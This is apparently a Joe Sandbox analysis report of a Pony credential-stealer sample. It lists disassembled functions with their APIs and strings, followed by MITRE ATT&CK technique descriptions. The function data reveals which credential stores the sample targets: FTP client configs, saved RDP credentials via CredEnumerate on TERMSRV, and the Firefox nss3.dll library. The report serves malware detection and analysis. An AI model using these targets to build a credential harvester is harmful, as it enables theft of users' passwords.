Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: FTP Commander$FTP Navigator$ftplist.txt
API String ID: 1884169789-2424314702
Opcode ID: 8ffd56609c937c8b0e29ab407aeaca567c2fb79e05fe6fc345a96c75e18709c7
Instruction ID: d98304a0afc87026386aaded3bd84dc36ec1ca4c9ab2c17e8643749e72736781
Opcode Fuzzy Hash: 8ffd56609c937c8b0e29ab407aeaca567c2fb79e05fe6fc345a96c75e18709c7
Instruction Fuzzy Hash: 6A01C270600505BADB1177628C06FBF3E5BDB81354F24413BB904B51E5DA7C5E818EAC

Function 0040CE1B Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(011B3E08,FTPNow), ref: 0040CE42
StrStrIA.SHLWAPI(011B3E08,FTP Now,011B3E08,FTPNow), ref: 0040CE53

Strings

FTP Now, xrefs: 0040CE4D
sites.xml, xrefs: 0040CE6C
FTPNow, xrefs: 0040CE3C

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: FTP Now$FTPNow$sites.xml
API String ID: 0-284577462
Opcode ID: e85b3cb2380bbeee5d69e9919d2c1b42bce6bfef2b31001bda82e8b44ce36feb
Instruction ID: f3a7e70844c111737c6bf34252b67c8892eb3c8061eea0710213056f6df2ad90
Opcode Fuzzy Hash: e85b3cb2380bbeee5d69e9919d2c1b42bce6bfef2b31001bda82e8b44ce36feb
Instruction Fuzzy Hash: E6F0D670600105B5DB217771CC82F6F3E654B91758F24033BB524B51E2DFBDCA8196AD

Function 00BA52B7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00BA52C3

Part of subcall function 00BA344C: __getptd_noexit.LIBCMT ref: 00BA344F
Part of subcall function 00BA344C: __amsg_exit.LIBCMT ref: 00BA345C

__getptd.LIBCMT ref: 00BA52DA
__amsg_exit.LIBCMT ref: 00BA52E8
__lock.LIBCMT ref: 00BA52F8
__updatetlocinfoEx_nolock.LIBCMT ref: 00BA530C

Memory Dump Source

Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 203fa3779de82baab59e6dea5f7548544cbb6c1dbaa0a6f739c5715a9f5a3d1f
Instruction ID: eed670ac18b967e62f7e4a33f07424a6f070af35b6b4aa073188ea672a5206ba
Opcode Fuzzy Hash: 203fa3779de82baab59e6dea5f7548544cbb6c1dbaa0a6f739c5715a9f5a3d1f
Instruction Fuzzy Hash: FCF0907290CB10ABD671BB689803B5E76D0AF07B20F1541C9F401AB6D2CF745F40DA5A

Function 0040C3B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C3D2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C3F4
StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C408

Strings

Settings, xrefs: 0040C425

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$OpenStorage
String ID: Settings
API String ID: 2489594185-473154195
Opcode ID: a38cb77ed92376c5c3d2c86b77c29051cae9eabeeff3c0da8091db23dd4a7770
Instruction ID: aecc0d1951bb4ed84c2bc1352e12af1dd0ef6abf2fee423dc7c1646d90439f1c
Opcode Fuzzy Hash: a38cb77ed92376c5c3d2c86b77c29051cae9eabeeff3c0da8091db23dd4a7770
Instruction Fuzzy Hash: 9D31BB31D4020AFBEF11AFA1CC42FAEBB76BF44704F208266B610791F1D6759A50AB58

Function 004083A2 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

http://, xrefs: 004083F7
https://, xrefs: 00408408

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: http://$https://
API String ID: 0-1916535328
Opcode ID: 39d7d017b2bfccf2b7ff02d95f8e3b57887f070f51d240ca058be188e98a1ddb
Instruction ID: 59d31cc17ce28022f2912d39386f2671d424408c231291671feefe15d01a8b62
Opcode Fuzzy Hash: 39d7d017b2bfccf2b7ff02d95f8e3b57887f070f51d240ca058be188e98a1ddb
Instruction Fuzzy Hash: 9241F431800109FADF12AF91DE45BDE7B72AF40308F10817AF951791E1DB798BA0EB59

Function 0040CA54 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF

StrStrIA.SHLWAPI(?,004167DE), ref: 0040CA93
lstrlenA.KERNEL32(TERMSRV/,?,004167DE), ref: 0040CAA1
StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,004167DE), ref: 0040CAB1

Strings

TERMSRV/, xrefs: 0040CA9C, 0040CAA9

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: TERMSRV/
API String ID: 1659193697-3001602198
Opcode ID: 7f94b50e48cdeab5a7c9e9d7e18237ce5f200bd076a7c76d6095bbe6d9e3bbaa
Instruction ID: c7fb664706467371fd79dda97cb73d98fe1a168560675967c2bc25be9365f3c6
Opcode Fuzzy Hash: 7f94b50e48cdeab5a7c9e9d7e18237ce5f200bd076a7c76d6095bbe6d9e3bbaa
Instruction Fuzzy Hash: C911963151010DFBCF026F65DD829DD3E22AF44358F104526BD25781F1DB7ADAB1AB98

Function 00401C93 Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401CB4
lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID:
API String ID: 2414487701-0
Opcode ID: 35e48de9ef45b66baf13970b20c5c5913bfad593f4f38aafa79406b17557bb0f
Instruction ID: 0d71ddcc776453f6807f4a2644943ab45e2aa76a7b4ada536b522d4d67ac145f
Opcode Fuzzy Hash: 35e48de9ef45b66baf13970b20c5c5913bfad593f4f38aafa79406b17557bb0f
Instruction Fuzzy Hash: EAF0F475500208BFEF017F61CC85ADA3A98AB5039CF00C12ABC1918262D7BDCAC49B88

Function 00401C3F Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401C60
lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID:
API String ID: 2414487701-0
Opcode ID: a5145505d8b7b002e04c78e64ecefef1a810ed9ebe4f332c19b7d983fded2b1f
Instruction ID: ca5b4a345fe0166e5dd6a2ca728e5449c9932da92f02a55abf7aefca79bb44fa
Opcode Fuzzy Hash: a5145505d8b7b002e04c78e64ecefef1a810ed9ebe4f332c19b7d983fded2b1f
Instruction Fuzzy Hash: 31F01C7510030CBFEF003F61CC81A9E3A98EB1535CF00D12ABC2A59262D7BDC9D49B58

Function 00408E9B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00408EAE
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408ECF

Strings

nss3.dll, xrefs: 00408ED9

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CurrentDirectorylstrlen
String ID: nss3.dll
API String ID: 2713697268-2492180550
Opcode ID: def9fda2b1dd31527a69a2c4e7275fb1b3f76d08939b7249084c830a98d10a6b
Instruction ID: 607dede2c62840eaa67276cbe4800c76269459c512096fa5e078730568560c26
Opcode Fuzzy Hash: def9fda2b1dd31527a69a2c4e7275fb1b3f76d08939b7249084c830a98d10a6b
Instruction Fuzzy Hash: E0116530500106DFDB11AF70DD49BCB3FA1FB54349F10903BF449A52E1DBBA88959A4D

Function 0040CB05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CB44
CredFree.ADVAPI32(00000000), ref: 0040CB8B

Strings

TERMSRV/*, xrefs: 0040CB3F

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Cred$EnumerateFree
String ID: TERMSRV/*
API String ID: 3403564193-275249402
Opcode ID: 33381bba7bd9533033619352b0ea26ba5ed8ec3c00acc8a710606ef1cb1c3413
Instruction ID: d31309ea4916ea7d4aeac043a37891cba6fae50ae8bf38473393457ebaf40a98
Opcode Fuzzy Hash: 33381bba7bd9533033619352b0ea26ba5ed8ec3c00acc8a710606ef1cb1c3413
Instruction Fuzzy Hash: 05115E31400209EBDF218F98E84ABDEB7B4FB04315F14427AD541711E1C379BA84EB89

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report a5gvJhukP7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Pony

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
a5gvJhukP7.exe

Function 00BA1300 Relevance: 49.9, APIs: 33, Instructions: 379
libraryloaderinjectionCOMMON

Function 00BA1950 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 198
libraryloaderCOMMON

Function 00BA1E10 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 169
libraryloadersleepCOMMON

Function 00BA2110 Relevance: 10.6, APIs: 7, Instructions: 147
windowCOMMON

Function 00BA17A7 Relevance: 21.1, APIs: 14, Instructions: 133
libraryloaderinjectionCOMMON

Function 00BA1806 Relevance: 16.6, APIs: 11, Instructions: 103
libraryloaderthreadCOMMON

Function 00BA229A Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Function 00BA3595 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Function 00BA331F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
COMMONLIBRARYCODE

Function 00BA49BB Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Function 00BA5D70 Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Function 00BA52B7 Relevance: 7.5, APIs: 5, Instructions: 34
COMMONLIBRARYCODE

Function 0040E9CE Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Function 0040D1E9 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Function 00404CB4 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Function 0040443E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre